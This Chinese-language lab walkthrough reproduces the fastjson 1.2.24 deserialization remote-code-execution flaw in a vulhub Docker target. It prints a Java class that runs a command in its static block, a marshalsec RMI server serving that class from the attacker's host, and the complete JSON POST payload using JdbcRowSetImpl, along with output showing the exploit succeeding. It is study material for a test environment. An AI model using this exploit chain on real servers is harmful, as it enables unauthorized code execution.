fastjson 1.2.24 反序列化导致任意命令执行漏洞

环境搭建vulhub一键启动

/#/environments/fastjson/1.2.24-rce/

docker-compose up -d

访问本地ip的8090端口

1.bp抓包发现对象转换成json格式数据

2.更换数据测试

右键 change request method 改成post发包，类型改为json

3.建立rmi服务器

保存java恶意代码如下，（执行 touch /tmp/success）

// javac TouchFile.javaimport java.lang.Runtime;import java.lang.Process;public class TouchFile {static {try {Runtime rt = Runtime.getRuntime();String[] commands = {"touch", "/tmp/success"};Process pc = rt.exec(commands);pc.waitFor();} catch (Exception e) {// do nothing}}}

编译代码，注意此环境需要jdk1.8环境编译，kail默认是11.0版本，需要安装jdk1.8（略），并且选择使用jdk1.8

┌──(root💀kali)-[~]└─# update-alternatives --config java有 2 个候选项可用于替换 java (提供 /usr/bin/java)。选择 路径 优先级 状态------------------------------------------------------------* 0 /usr/lib/jvm/java-11-openjdk-amd64/bin/java 1111自动模式1 /usr/lib/jvm/java-11-openjdk-amd64/bin/java 1111手动模式2 /usr/local/jdk1.8/jdk1.8.0_161/bin/java 1 手动模式要维持当前值[*]请按<回车键>，或者键入选择的编号：2update-alternatives: 使用 /usr/local/jdk1.8/jdk1.8.0_161/bin/java 来在手动模式中提供 /usr/bin/java (java)┌──(root💀kali)-[~]└─# java -version java version "1.8.0_161"Java(TM) SE Runtime Environment (build 1.8.0_161-b12)Java HotSpot(TM) 64-Bit Server VM (build 25.161-b12, mixed mode)

javac 编译生成class文件

当前目录使用python搭建web，发布编译好的文件

python3 -m http.server 8888

使用工具marshalsec 搭建rmi服务器

git clone /mbechler/marshalsec.gitcd marshalsemvn clean package -DskipTests （需要等待一会），要安装maven apt-git installmaven

我们借助marshalsec项目，启动一个RMI服务器，监听9999端口，并制定加载远程类TouchFile.class：

需要把marshalsec-0.0.3-SNAPSHOT-all.jar拷贝到恶意代码目录

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.8.143:8888/#TouchFile" 9999

向靶场服务器发送Payload，带上RMI的地址：改为rmi服务器ip

POST / HTTP/1.1Host: your-ip:8090Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/jsonContent-Length: 160{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://:9999/TouchFile","autoCommit":true}}

进入容器发现tmp下有success，反序列化命令执行成功

──(root💀kali)-[~]└─# docker ps 130 ⨯CONTAINER ID IMAGECOMMAND CREATED STATUSPORTSNAMES66effc71796b vulhub/fastjson:1.2.24 "java -Dserver.addre…" 19 hours ago Up 24 minutes 0.0.0.0:8090->8090/tcp 1224-rce_web_1┌──(root💀kali)-[~]└─# docker exec -it 66effc71796b /bin/bashroot@66effc71796b:/# cd tmp/root@66effc71796b:/tmp# lshsperfdata_root tomcat-docbase.3017740528426830119.8090 tomcat.1457512698342180460.8090successtomcat-docbase.3871276941847431940.8090 tomcat.2826139588232407997.8090root@66effc71796b:/tmp#

如果觉得《fastjson 1.2.24 反序列化导致任意命令执行漏洞》对你有帮助，请点赞、收藏，并留下你的观点哦！